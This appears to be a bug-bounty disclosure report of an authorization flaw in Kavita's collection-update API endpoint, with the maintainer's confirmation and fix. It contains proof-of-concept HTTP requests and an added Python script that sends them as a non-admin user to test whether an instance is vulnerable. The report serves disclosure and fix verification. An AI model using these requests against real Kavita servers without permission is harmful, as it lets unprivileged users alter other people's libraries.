IDOR allows creating a new collection or modifying an existing one in kareadita/kavita

Valid

Reported on

Aug 8th 2022


Description

A normal (non-administrator) user can create a new collection from a list of book ids, or add books to an existing collection. Both operations are intended to be available only to administrators.

This is possible because the /api/collection/update-for-series API endpoint does not check that the caller holds the administrative role. The root cause is therefore missing function-level authorization on the endpoint: any authenticated account can invoke it.

Proof of Concept

Create a new collection:

1 - Send the following request. A collectionTagId of 0 tells the server to create a new collection, and the seriesIds array lists the ids of all the books that will be added to it:

POST http://localhost:5000/api/collection/update-for-series
Authorization: Bearer <token>
Content-Type: application/json

{"collectionTagId":0,"collectionTagTitle":"Collection3","seriesIds":[1,2,3,4,5]}

Add new books to an existing collection:

1 - Send the following request, with the id of the target collection in collectionTagId and the ids of the books to add in the seriesIds array (the supplied collectionTagTitle is applied to the collection as well):

POST http://localhost:5000/api/collection/update-for-series
Authorization: Bearer <token>
Content-Type: application/json

{"collectionTagId":<collection-id>,"collectionTagTitle":"New title","seriesIds":[3,4,5]}
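The two requests above, scripted as an added example that is not part of the original report or of the Kavita project: it builds the same JSON bodies, sends them as a non-admin user, and classifies the server's answer (a 2xx means the endpoint acted on the request and the role check is missing; 401/403 means the check is in place). The base URL, the token and the target collection id 1 are assumptions supplied by the caller; only the endpoint path and the field names come from the report.

```python
"""Added example: drive the PoC requests against a Kavita instance and
classify the outcome.  Assumes KAVITA_URL / KAVITA_TOKEN in the environment,
with the token belonging to a NON-admin account (assumption, not from the report)."""
import json
import os
import urllib.error
import urllib.request

ENDPOINT = "/api/collection/update-for-series"  # path from the report


def build_payload(collection_tag_id, title, series_ids):
    """Build the request body used by the PoC.
    collectionTagId 0 means 'create a new collection'; any positive id means
    'modify that existing collection'."""
    if collection_tag_id < 0:
        raise ValueError("collectionTagId must be 0 (create) or a positive id (modify)")
    return {
        "collectionTagId": collection_tag_id,
        "collectionTagTitle": title,
        "seriesIds": list(series_ids),
    }


def classify(status):
    """Map the HTTP status a non-admin receives to a verdict.
    2xx      -> the server performed the operation: role check missing.
    401/403  -> the request was rejected: administrative check present.
    anything else (400 bad body, 404 wrong path, 5xx) -> inconclusive."""
    if 200 <= status < 300:
        return "vulnerable"
    if status in (401, 403):
        return "fixed"
    return "inconclusive"


def send(base_url, token, payload):
    """POST the payload with the bearer token and return the HTTP status."""
    req = urllib.request.Request(
        base_url.rstrip("/") + ENDPOINT,
        data=json.dumps(payload).encode(),
        method="POST",
        headers={"Authorization": f"Bearer {token}",
                 "Content-Type": "application/json"},
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code


def check(base_url, token, existing_collection_id=1):
    """Run both PoC steps and return {step: verdict}."""
    results = {}
    # Step 1 of the PoC: create a new collection holding books 1..5.
    create = build_payload(0, "Collection3", [1, 2, 3, 4, 5])
    results["create"] = classify(send(base_url, token, create))
    # Step 2 of the PoC: add books 3..5 to an existing collection.
    # existing_collection_id=1 is an assumption; pick a real id on the target.
    modify = build_payload(existing_collection_id, "New title", [3, 4, 5])
    results["modify"] = classify(send(base_url, token, modify))
    return results


if __name__ == "__main__":
    url = os.environ.get("KAVITA_URL", "http://localhost:5000")
    token = os.environ["KAVITA_TOKEN"]
    for step, verdict in check(url, token).items():
        print(f"{step}: {verdict}")
```

Run it once with a normal-user token before and after applying the fix: the verdict should move from "vulnerable" to "fixed" for both steps, and an admin token should still get "vulnerable" (i.e. 2xx), which confirms the check is role-based rather than a blanket block.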

Impact

An authenticated attacker holding only a normal user account can create a new collection or modify the contents of an existing one, because the endpoint performs no administrative authorization check.

We are processing your report and will contact the kareadita/kavita team within 24 hours. a month ago
We have contacted a member of the kareadita/kavita team and are waiting to hear back a month ago
kareadita/kavita maintainer has acknowledged this report a month ago
Joseph Milazzo
a month ago

Maintainer


Is this on v0.5.4 only or on 0.5.4.2 (the new hotfix which addressed your last round of vulnerabilities)?

vultza modified the report
a month ago
vultza
a month ago

Researcher


It targets v0.5.4.2. I just modified the original report, because I submitted this report before the hotfix. The vulnerability still exists, missing an administrative check, but now it is only possible if the attacker is authenticated as a normal user.

Joseph Milazzo validated this vulnerability a month ago

I did confirm it, one line of missing code. Fixed locally, planned for next Stable. Thanks again for the report.

vultza has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the kareadita/kavita team. We will try again in 7 days. a month ago
Joseph Milazzo confirmed that a fix has been merged on ae891c a month ago
Joseph Milazzo has been awarded the fix bounty